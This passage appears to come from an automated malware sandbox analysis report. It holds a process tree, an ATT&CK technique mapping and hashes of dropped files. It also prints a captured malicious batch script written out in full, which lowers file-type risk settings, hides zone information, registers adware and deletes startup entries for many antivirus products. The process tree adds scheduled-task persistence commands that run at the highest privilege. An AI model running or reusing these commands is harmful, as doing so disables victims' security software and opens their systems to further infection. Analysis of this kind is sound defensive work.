"24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                    4⤵
                      PID:4284
              • C:\Users\Admin\AppData\Local\Temp\D01A.exe
                C:\Users\Admin\AppData\Local\Temp\D01A.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2784
                • C:\Users\Admin\AppData\Local\Temp\D01A.exe
                  C:\Users\Admin\AppData\Local\Temp\D01A.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4384
              • C:\Users\Admin\AppData\Local\Temp\D4FD.exe
                C:\Users\Admin\AppData\Local\Temp\D4FD.exe
                1⤵
                • Executes dropped EXE
                PID:2344
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 732
                  2⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3980
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 776
                  2⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2772
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 848
                  2⤵
                  • Program crash
                  PID:964
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 880
                  2⤵
                  • Program crash
                  PID:3180
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 776
                  2⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2948
              • C:\Users\Admin\AppData\Local\Temp\D78E.exe
                C:\Users\Admin\AppData\Local\Temp\D78E.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3360
              • C:\Users\Admin\AppData\Local\Temp\DCEE.exe
                C:\Users\Admin\AppData\Local\Temp\DCEE.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2960
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:2296
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:3100
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:2288
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3180
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:964
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:2512
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:1340
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:420
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:3300
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_043303\fsucenter.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Creates scheduled task(s)
                              PID:4764
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\twain_32\explorer.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Creates scheduled task(s)
                              PID:4712
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Documents and Settings\services.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Creates scheduled task(s)
                              PID:4796
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_043241\fsucenter.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Creates scheduled task(s)
                              PID:4860

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Initial Access

                            Execution

                            Scheduled Task

                            1
                            T1053

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Registry Run Keys / Startup Folder

                            1
                            T1060

                            Scheduled Task

                            1
                            T1053

                            Privilege Escalation

                            Scheduled Task

                            1
                            T1053

                            Defense Evasion

                            Modify Registry

                            3
                            T1112

                            Disabling Security Tools

                            1
                            T1089

                            Virtualization/Sandbox Evasion

                            1
                            T1497

                            Install Root Certificate

                            1
                            T1130

                            Credential Access

                            Credentials in Files

                            3
                            T1081

                            Discovery

                            Query Registry

                            4
                            T1012

                            Virtualization/Sandbox Evasion

                            1
                            T1497

                            System Information Discovery

                            4
                            T1082

                            Peripheral Device Discovery

                            1
                            T1120

                            Lateral Movement

                            Collection

                            Data from Local System

                            3
                            T1005

                            Exfiltration

                            Command and Control

                            Web Service

                            1
                            T1102

                            Impact

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\Database.exe
                              MD5

                              30f0a5fe731fd2735b8c196fd0fe91cf

                              SHA1

                              2eb63724fd11bf8e082bcd99301654111ad0d831

                              SHA256

                              13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                              SHA512

                              acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                              Download Submit
                            • C:\ProgramData\Data\install.exe
                              MD5

                              3319cb474eaa2f3812956b271ff29635

                              SHA1

                              74fbed926e8de14fa5eb6a5a47fb873def72fb81

                              SHA256

                              79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

                              SHA512

                              c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

                              Download Submit
                            • C:\ProgramData\Data\install.exe
                              MD5

                              3319cb474eaa2f3812956b271ff29635

                              SHA1

                              74fbed926e8de14fa5eb6a5a47fb873def72fb81

                              SHA256

                              79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

                              SHA512

                              c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

                              Download Submit
                            • C:\ProgramData\Runtimebroker.exe
                              MD5

                              4982f571dc2169b180285b5b30ac5679

                              SHA1

                              a312adfd6c0ff33d0dc83a00fa599a0cb6303d86

                              SHA256

                              d785786f4a52b9631b725abc1184e1f3814feeade38c7ac342d70f0b5ed4b3cb

                              SHA512

                              9919fc242a94cd8cc9c0a33de91f44f3641d7c2e5fc88ad6ec4040e4110e7a28f59dac32a19547f0767f247ee40dde62bfc58c0bce7b12fbc19c491e3601c4df

                              Download Submit
                            • C:\ProgramData\Runtimebroker.exe
                              MD5

                              4982f571dc2169b180285b5b30ac5679

                              SHA1

                              a312adfd6c0ff33d0dc83a00fa599a0cb6303d86

                              SHA256

                              d785786f4a52b9631b725abc1184e1f3814feeade38c7ac342d70f0b5ed4b3cb

                              SHA512

                              9919fc242a94cd8cc9c0a33de91f44f3641d7c2e5fc88ad6ec4040e4110e7a28f59dac32a19547f0767f247ee40dde62bfc58c0bce7b12fbc19c491e3601c4df

                              Download Submit
                            • C:\ProgramData\Systemd\HostData.exe
                              MD5

                              cbf26c74a0a12b5f17ba7596ff6ad19f

                              SHA1

                              6dc733432c290f1fbf5ddda2571b7f538445202b

                              SHA256

                              095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

                              SHA512

                              8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

                              Download Submit
                            • C:\ProgramData\Systemd\HostData.exe
                              MD5

                              cbf26c74a0a12b5f17ba7596ff6ad19f

                              SHA1

                              6dc733432c290f1fbf5ddda2571b7f538445202b

                              SHA256

                              095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

                              SHA512

                              8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

                              Download Submit
                            • C:\ProgramData\Systemd\config.json
                              MD5

                              a285ac140c8c6806223bfdc02302173e

                              SHA1

                              06ca61cae058c568860858e49615d04dc4a8820d

                              SHA256

                              36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb

                              SHA512

                              f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                              MD5

                              c558fdaa3884f969f1ec904ae7bbd991

                              SHA1

                              b4f85d04f6bf061a17f52c264c065b786cfd33ff

                              SHA256

                              3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

                              SHA512

                              6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              MD5

                              4af92c84bcce0ceb0c0ab166eec42a56

                              SHA1

                              39884ef7fb2aa6ce97d3cfefdf4010c6eb24f957

                              SHA256

                              e2ace8c01bf5755d3453413e580f7977439d63b9b047e63d720e16aed46e87ce

                              SHA512

                              16c87b13873a70b755b65bc83e2a9f0ae90451fbe66e5eef6bf8d84db951929b73d73b9fcbddd7f527e55c7f6eb78488f5bd2e1a6ae4352034d64910bc4ee207

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              MD5

                              053e9509c5bd7c10c0236eef7d40a3c3

                              SHA1

                              95eaf66faa68a07115818b43d3666d2ce86c2df3

                              SHA256

                              188e797d5536e482ef84cd179bb922a5b6aa2277f011fa74b8fd3321d1ba59c0

                              SHA512

                              6e5bc178416cd7df5c9f550c061ba98cf81012a19c20670d206621ffd3533a7a0d67c8113387cb5cf335e86859f920aa212d3aa494f26bc6b663255a0ad38be7

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Temp\BCCE.exe
                              MD5

                              e987477b0d14b6d7075f0105aa28ba92

                              SHA1

                              54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

                              SHA256

                              4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

                              SHA512

                              bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Temp\BCCE.exe
                              MD5

                              e987477b0d14b6d7075f0105aa28ba92

                              SHA1

                              54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

                              SHA256

                              4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

                              SHA512

                              bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

                              Download Submit
                            • C:\Users\Admin\AppData\Local\Temp\BCCE.exe
                              MD5

                              e987477b0d14b6d7075f0105aa28ba92

                              SHA1

                              54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

                              SHA256

                              4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

                              SHA512

                              bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

                              Download Submit
